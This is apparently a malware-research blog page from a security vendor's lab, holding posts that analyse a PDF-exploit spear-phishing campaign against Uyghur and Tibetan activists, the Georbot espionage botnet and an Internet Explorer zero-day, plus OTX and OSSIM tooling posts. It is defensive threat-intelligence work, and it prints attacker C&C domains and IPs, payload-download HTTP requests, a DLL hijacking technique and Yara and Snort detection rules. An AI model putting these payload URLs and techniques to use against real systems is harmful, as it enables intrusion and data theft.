AlienVault R&D Labs Portal. Get the latest news from our research.
Header

Latest Adobe PDF exploit used to target Uyghur and Tibetan activists

March 14th, 2013 | Posted by jaime.blasco in APT | Attacks | Exploits | IP Reputation | Malware | News | Snort - (Comments Off)

Last month Adobe released a fix to patch a vulnerability that was being exploited in the wild. Kaspersky found that the 0day was being used by a very sophisthicated group to target different governments  using a malware called MiniDuke.

Alienvault Labs have detected that a different group of attackers have been using this vulnerability to target non-governmental and human rights organizations.

Together with our partner Kaspersky Labs we are releasing an analysis of this campaign. You can read his report here.

Based on the samples we found we believe this group has been running a SpearPhishing campaign from the last few weeks. The files we have analyzed are PDF files that contain code to exploit CVE-2013-0640. Once the victim opens the file, the system gets infected and a lure document is displayed to the victim. Some of the PDF lures we have found are:

 

 

 

 

 

 

 

 

 

 

 

 

Some of the exploit filenames:

  • 2013-Yilliq Noruz Bayram Merikisige Teklip.pdf
  • 联名信.pdf
  • arp.pdf

Based on the lures we found it seems the same group is targeting both Tibet and Uyghur activists in the same campaign.

The Javascript code inside the PDF files is very similar to the one found in the Itaduke samples but part of the initial variables and the obfuscation has been removed from the original one.

The shellcode will create the file AcroRd32.exe in the Temp folder. That file decrypts an encrypted block using XOR operations with the key “0l23kj@nboxu”.

The malicious payload will perform the following operations:

- Copy \WINDOWS\system32\wuauclt.exe to %APPDATA%\wuauclt\wuauclt.exe
- Drop a malicious DLL under %APPDATA%\wuauclt\clbcatq.dll
- Execute %APPDATA%\wuauclt\wuauclt.exe

Note that wuauclt.exe is a benign system executable. Once the system file is executed, the malicious DLL will be loaded. This technique is known as DLL search order hijacking.

The malicious DLL will be loaded when wuauclt.exe is executed. It is important to show that clbcatq.dll is not exporting all the methods that the original clbcatq.dll has. It only implements the ones that are required to run the malicious code:

Original DLL                                                                       Malicious DLL

 

 

 

 

 

 

 

 

 

 

 

Once the malicious DLL is loaded, the malicious code will generate the following HTTP request:

 

 

 

 

 

The server will reply with an encrypted block of code that will be decrypted. The decrypted content is actually a DLL that exports the following functions:

  • GetWorkType
  • InfectFile

The payload will drop the following files:

  • \WINDOWS\system32\wbem\4BA5E980.PBK
  • \WINDOWS\system32\wbem\mstd32.dll

The InfectFile function will modify some code in the system library WINDOWS\system32\mswsock.dll. If we take a look at the patched DLL:

Original version

 

 

 

 

 

 

 

 

 

Modified version:

 

 

 

If we take a look at WSPStartup_0:

 

 

 

 

 

 

We can see how the malicious DLL mstd32.dll will be loaded everytime the system library mswsock.dll is loaded by a program.

The file mstd32.dll is signed using a certificate issued to “YNK JAPAN Inc. We have seen that certificate being used to sign malware dropped in several NGO attacks in the past.

 

 

 

 

 

 

Then the malicious code will perform the following HTTP request every few seconds:

 

 

 

 

 

The final payload is detected as Trojan.Win32.Swisyn and it has a lot of functionality to monitor and steal data from the infected system.

We have identified the following C&C servers for both payloads:

  • ly.micorsofts.net
  • ip.micrsofts.com
  • xdx.hotmal1.com
  • hy.micrsofts.com
All the DNS names are pointing to 60.211.253.28 at this time.

 

 

 

 

 

 

 

 

 

 

Both domains have been registered using the same mail address:

micorsofts.net

Created: 2008-05-12 01:51:10
Expires: 2013-05-12 01:51:10
Last Modified: 2012-05-02 13:26:38

Registrant Contact:
GW SY
li wen li wen (lcb_jn@sina.com)
zq dj
jiningshi, shandongsheng, cn 272000
P: +86.05372178000 F: +86.05372178000

hotmal1.com

Created: 2008-12-30 03:53:18
Expires: 2013-12-30 03:53:18
Last Modified: 2012-12-26 15:32:15

Registrant Contact:
GW SY
li wen li wen (lcb_jn@sina.com)
zq dj
shixiaqu, beijingshi, cn 272000
P: +86.02227238836601 F: +86.02227238836601

Profile of the user on 20cn.net

We – Alienvault Labs- have written some Snort rules to match the network behavior:

 

You can use the following Yara rule to match the malicious binaries:

 

 

 

 

 

 

 

 

And this one to detect the malicious PDF files:

 

 

 

 

 

 

Finally, we are releasing some OpenIOC indicators as well:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

You can find all the content in our GitHub repository.

The rules have been included in the EmergingThreats ruleset as well as in our Open Source SIEM.

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , , ,

Georbot Botnet – A cyber espionage campaign against Georgian Government

October 31st, 2012 | Posted by jaime.blasco in APT | Attacks | Exploits | Forensics | IP Reputation | Malware | News | OTX | Snort - (Comments Off)

A few days ago, CERT-Georgia published a great report describing a cyber spionage campaign. ESET wrote a great report a few months ago as well. The report said the malware was found in Georgian Governmental Agencies including ministries, parliament, banks, ngo’s. The report also says the purpose of the malware was “Collecting Sensitive, Confidential Information about Georgian and American Security Documents” and it establishes a connection with Russian Official Security Agencies.

In this blog post we will offer a brief about the infection vectors as well as the malware behavior and we will share some IOC’s and signatures to detect the presence of the malware in your systems.

Infection method

To compromise the victims, the attackers placed javascript code or iframes into websites leading to exploit code.

The compromised website includes Georgian Government servers like ema.gov.ge. Other examples are:

- ema.gov.ge

- 31.214.140.214

- 178.32.91.70

- georgiaonline.xp3.biz

- 31.31.75.63

173.212.192.83

An example of a malicious javascript is as follow:

 

 

 

 

 

The malicious javascript present in frame.js/frame.php includes code that exploits several vulnerabilities including CVE-2010-0842,   CVE-2006-3730, MS06-057 and some Java exploits.

Examples of exploit codes found:

178.32.91.70 [/] modules[/]docs[/]newexp[.]jar https://www.virustotal.com/file/9bf88bf15ffa6888ec2a3bd9e8dc6d13b650f1122ca69cface9ccf777c32e259/analysis/

178.32.91.70 [/] modules[/]docs[/]Java-2010-0842[.]jar

https://www.virustotal.com/file/7a900cc7616cfbf2ca17350c436af2490621550ded3e29325dc31149db50c63d/analysis/

 

 

 

 

 

 

 

 

Once the exploit code is executed, the payload calc.exe that contains the malware is downloaded from the remote server.

The malware uses a custom packer to evade security security products. It also uses obfuscation to hide both the configuration values and the API calls.

The malware uses byte substraction operations to hide the strings including the configuration values:

 

 

 

 

 

 

 

 

 

 

 

After deobfuscation:

 

 

 

 

 

 

 

 

 

 

 

We can use the following Yara rule to detect the obfuscated binary:

rule GeorBotBinary
{
strings:
$a = {63 72 ?? 5F 30 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C}

condition:
all of them
}

Based on the deofuscated strings we can also write a Yara rule to detect the presence of the malware in memory:

rule GeorBotMemory
{
strings:
$a = {53 4F 46 54 57 41 52 45 5C 00 4D 69 63 72 6F 73 6F 66 74 5C 00 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 00 52 75 6E 00 55 53 42 53 45 52 56}
$b = {73 79 73 74 65 6D 33 32 5C 75 73 62 73 65 72 76 2E 65 78 65}
$c = {5C 75 73 62 73 65 72 76 2E 65 78 65}
condition:
$a and ($b or $c)
}

We use both the registry key used to maintain persistence and the executable name that the malware creates on the system (in version >=5 of the malware those values are stored on wide strings).

If we have a memory image of a system we can use Volatility to look for processes matching our Yara rule:

$ python vol.py -f /Users/jaime/tmp/geor.img yarascan -y GeorBotMemory.yara
Volatile Systems Volatility Framework 2.1_alpha

Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004055b3 53 4f 46 54 57 41 52 45 5c 00 4d 69 63 72 6f 73 SOFTWARE\.Micros
0x004055c3 6f 66 74 5c 00 57 69 6e 64 6f 77 73 5c 43 75 72 oft\.Windows\Cur
0x004055d3 72 65 6e 74 56 65 72 73 69 6f 6e 5c 00 52 75 6e rentVersion\.Run
0x004055e3 00 55 53 42 53 45 52 56 00 2e 64 6f 63 00 2e 78 .USBSERV..doc..x
Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004059a6 73 79 73 74 65 6d 33 32 5c 75 73 62 73 65 72 76 system32\usbserv
0x004059b6 2e 65 78 65 00 43 3a 5c 57 49 4e 44 4f 57 53 5c .exe.C:\WINDOWS\
0x004059c6 73 79 73 74 65 6d 33 32 5c 75 73 62 63 6c 69 65 system32\usbclie
0x004059d6 6e 74 2e 65 78 65 00 43 3a 5c 57 49 4e 44 4f 57 nt.exe.C:\WINDOW
Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004059ae 5c 75 73 62 73 65 72 76 2e 65 78 65 00 43 3a 5c \usbserv.exe.C:\
0x004059be 57 49 4e 44 4f 57 53 5c 73 79 73 74 65 6d 33 32 WINDOWS\system32
0x004059ce 5c 75 73 62 63 6c 69 65 6e 74 2e 65 78 65 00 43 \usbclient.exe.C
0x004059de 3a 5c 57 49 4e 44 4f 57 53 5c 73 79 73 74 65 6d :\WINDOWS\system

Network traffic

The malware uses HTTP to communicate with the C&C server. It contains several commands to upload and retrieve information from the victim. It also looks for malware updates every once in a while. In early versions the update version was requested from /modules/docs/upload/calc.exe on the C&C server.

 

 

 

 

 

In newer versions the malware performs a request to /calc.php and the server sends base64 encode content (it can be done using content from different servers at the same time).

 

 

 

 

 

 

 

When the malware starts it sends the following request to the C&C:

 

 

 

 

 

Every minute it sends the following HTTP request to the C&C to ask for instructions:

 

 

 

 

In newer versions the parameter “cam” was also introduced that tells the C&C whether the infected system has a webcam.

/index312.php?ver=5.1&cam=0&p=cert123&id=401acd00

You can use the following snort to detect the presence of this malware in your network:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”ET MALWARE Georbot requesting update”; flow: to_server,established; content:”/modules/docs/upload/calc.exe”; http_uri; classtype:trojan-activity; sid:1111111112; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”ET MALWARE Georbot initial checkin”; flow: to_server,established; content:”POST”; http_method; nocase; content:”.php?ver=”; http_uri; content:”&p=cert123″; fast_pattern; http_uri; content:”&id=”; http_uri; classtype:trojan-activity; sid:1111111113; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”ET MALWARE Georbot checkin”; flow: to_server,established; content:”.php?ver=”; http_uri; content:”&p=bot123″; fast_pattern; http_uri; content:”&id=”; http_uri; classtype:trojan-activity; sid:1111111114; rev:1;)

Emerging Threats Pro has coverage for previous versions (see “ETPRO TROJAN TDSS.xcn”) but the rules I posted will work with newer versions of the malware as well.

Based on the behavior of the malware we wrote this OpenIOC rule:

 

 

 

 

 

 

You can download all the content from this blog post on the following url:

https://github.com/jaimeblasco/AlienvaultLabs/tree/master/malware_analysis/Georbot

Happy Halloween!

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , , , , ,

Feeding Alienvault’s Open Threat Exchange (OTX) threat information to ArcSight

August 6th, 2012 | Posted by jaime.blasco in Alienvault OSSIM | IP Reputation | OTX - (Comments Off)

When we launched the Open Threat Exchange (OTX) project, one of our goals was creating an open and free threat database and exchange system. We want it to be used by as many users as possible using a wide range of technologies.

That is why we are publishing some code to feed our Open Threat Exchange (OTX) data to an ArcSight SIEM using the Common Event Format via Syslog.

The Open Threat Exchange (OTX) contains an IP reputation database that offers real time information of bad actors. Using this information within a SIEM gives you new possibilities to correlate data, for example:

  • Connection to know C&C servers
  • Detection of P2P botnets
  • Data exfiltration to low reputation servers
  • Password guessing attacks from bad actors
  • Exploit/Malware access from malicious servers
Download the required files:

The configuration is very easy, just open the configuration file config_otx.py:

[main]

syslog_level = notice

syslog_facility = daemon

syslog_host = 10.49.5.139

reputation_server = https://reputation.alienvault.com/

syslog_port = 514

revision = 0

[fields]

min_reliability = 2

min_priority = 2

ignore_activities =

[proxy]

enable = False

host =

user =

password =

port =

Configure your collector ip address on syslog_host and you are ready to go. The script will download the reputation data from ours servers (HTTP) and it will send that data to the collector using UDP.

Then you need to create an Active List in ArcSight to use the indicators.

If you need to access the Internet via a proxy, configure it under the proxy section.

Using this method, our reputation data is updated in an hourly basis so you can configure a cron job to execute the script once an hour.

You can also configure some filters, if you want to ignore some ff the activities we send you can use this syntax:

ignore_activities = Scanning Host,Spamming

The min_reliability is the minimum reliability value that will be send to the collector based on the reliability that OTX put to that ip address. The same with min_priority, it is the minimum priority value that will make the information to be sent.

$ python otx-arcsight.py

Server data rev is 14694

Local rev is 14694

It means the database is up to date.

$ python otx-arcsight.py

Server data rev is 14694

Local rev is 14691

Updating data from server

Downloading complete database

Sending CEF:0|AlienvaultOTX|AlienvaultOTX|1.0|100|Suspicious Host|1|src=94.248.192.110 msg=Scanning Host,http://labs.alienvault.com/labs/index.php/projects/open-source-ip-reputation-portal/information-about-ip/?ip\=94.248.192.110

Sending CEF:0|AlienvaultOTX|AlienvaultOTX|1.0|100|Suspicious Host|1|src=94.248.192.112 msg=Scanning Host,http://labs.alienvault.com/labs/index.php/projects/open-source-ip-reputation-portal/information-about-ip/?ip\=94.248.192.112

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , ,

New AlienVault OSSIM v4.0 is out: New correlation capabilities

July 18th, 2012 | Posted by jaime.blasco in Alienvault (Company) | Alienvault OSSIM | Attacks | IP Reputation | News | OTX - (2 Comments)

Today we are launching the new AlienVault OSSIM v4.0.

You can download it from here.

Apart from tons of new features, we have improved the correlation engine capabilities, two of the most impressive features are:

- Taxonomy correlation based on the Category and Subcategory of the events.
- Correlation using the Open Threat Exchange (OTX) data.

The correlation directives editor has been improved so you won’t need an XML editor anymore (in theory :D).

I will share with you a couple of  basic examples that will teach you how to use the new interface to build correlation rules using this new features.

Example 1: Outbound FTP connection to an external server marked as suspicious

On this example we will see how to detect outbound FTP connections to an external server that is present on the Open Threat Exchange system that indicates that can be a malicious or hacked server where data is being exfiltrated.

To create a new correlation rule click on Intelligence->Correlation Directives and then on the button “Add Directive”

 

 

 

 

 

 

Set the priority to 5:

 

 

 

 

 

 

 

 

 

 

And create the rule for the first level (the correlation directive will have only one level)

 

 

 

 

 

Then select the Taxonomy radio button and set the product type to Firewall

 

 

 

 

 

 

On the next window, select the Taxonomy radio button once again and set the category to Network and the subcategory to FTP_activity

 

 

 

 

 

 

 

The next window is used to set the source and destination conditions. For the Source we will click on HOME_NET, that means the correlation rule with match on events that have a source address belonging to the local networks we have defined in the system. For the destination click on !HOME_NET that will match on destination address that are outside our network. Click also on Reputation options and set “Reputation to” to yes. It will match on destination addresses that are marked as suspicious on the Open Threat Exchange data.

 

 

For the next windows you can let the default values set.

Once you create the correlation directive you have to perform a last step, it is because a small bug on the web interface. Go to Intelligence->Correlation Directives and on the User category click on “Edit XML directive file”:

 

 

 

 

 

As you can see in the following screenshot, add the content type=”detector” to the rule level of the XML file:

 

 

 

 

 

 

Finally click on Restart Server and your correlation rule will be loaded on the system.

Following you can see an example of the correlation rule firing:

 

 

 

 

 

 

 

 

If you click on the details, you will see that the alarm has been fired using an event from a Cisco Pix Firewall

 

 

 

 

 

 

 

 

This correlation rule is very useful to detect information being leaked to external servers by malware or intruders.

 

Example 2: SQL injection followed by error 500 on the web server

In this example we will see how to detect potential SQL injections in our web servers. The rule will detect an SQL injection attack detected by an Intrusion Detection System (IDS) followed by an error 500 on the destination web server that indicates that an error was detected on the web application.

Let’s create a new directive:

 

 


 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Let the default values for the next windows.

Then edit your recently created directive and add a new rule level:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

On the next screen you have to set the option Source, From a parent rule: Source IP from level 1 and Destination, From a Parent Rule: Destination IP from level 1 that means the source and destination should match with the values seen in the first level we created.

 

 

 

 

Set the number of ocurrences to 1:

 

 

 

 

 

 

 

The timeout to 10 seconds:

 

 

 

 
 

 

And the reliability to 8:

 

 

 

 

 

 

 

 

 

 

 

 

Now you are done, remember to edit the XML file as we did in the previous example and add the type=”detector” to both rule levels:

 

 

Enjoy it!. Remember if you have any comments or doubts feel free to ask in our brand new Alienvault OSSIM Forum

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

Ongoing attacks exploiting CVE-2012-1875

June 13th, 2012 | Posted by jaime.blasco in APT | Attacks | Exploits | IP Reputation | Malware - (Comments Off)

Yesterday, Microsoft released the June 2012 Black Tuesday Update including patches for a vulnerability affecting a wide range versions of Internet Explorer. The exploit works across different Windows versions ranging from XP to Windows 7.

The 0day has been actively exploited as reported by mcafee.

We have been able to find several servers hosting similar versions of the exploit. One of them was detected by our OTX system a couple of days ago:

http://labs.alienvault.com/labs/index.php/projects/open-source-ip-reputation-portal/information-about-ip/?ip=113.10.241.239

The exploit supports a wide range of languages and Windows versions and seems to be very reliable.

 

The exploit includes return-oriented programming (ROP) techniques that helps bypassing OS protections.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

The shellcode downloads the payload from the following url:

GET /javaw.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 113.10.241.239
Connection: Keep-Alive

https://www.virustotal.com/file/705cf0c95f7f0d351d480df4b48f723c7f72ce4e16b14a3a52f99081707e5a32/analysis/

 

 

 

 

 

A couple of days ago the AV detection rate was 3/41.

 

Other versions of the exploit have been found in different servers requesting the following payloads:

GET /english/cala.exe HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 140.109.236.143
Connection: Keep-Alive

and

GET /img/books.cab HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: www.villagXXXX
Connection: Keep-Alive

https://www.virustotal.com/file/1581c0555956f7f62c717e303b6f8785207f107fbb4e375c1e50788d9a4a2f07/analysis/

 

 

 

 

 

 

 

The payloads seems to be RAT (Remote Access Tools).

The C&C server for that RAT is online (ip address 219.90.117.132)

219.90.117.128 – 219.90.117.159
China Shenzhen Soul Tech Co. Ltd

We will release more information as soon as we analyze the components involved on this attack.

 

 

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , , ,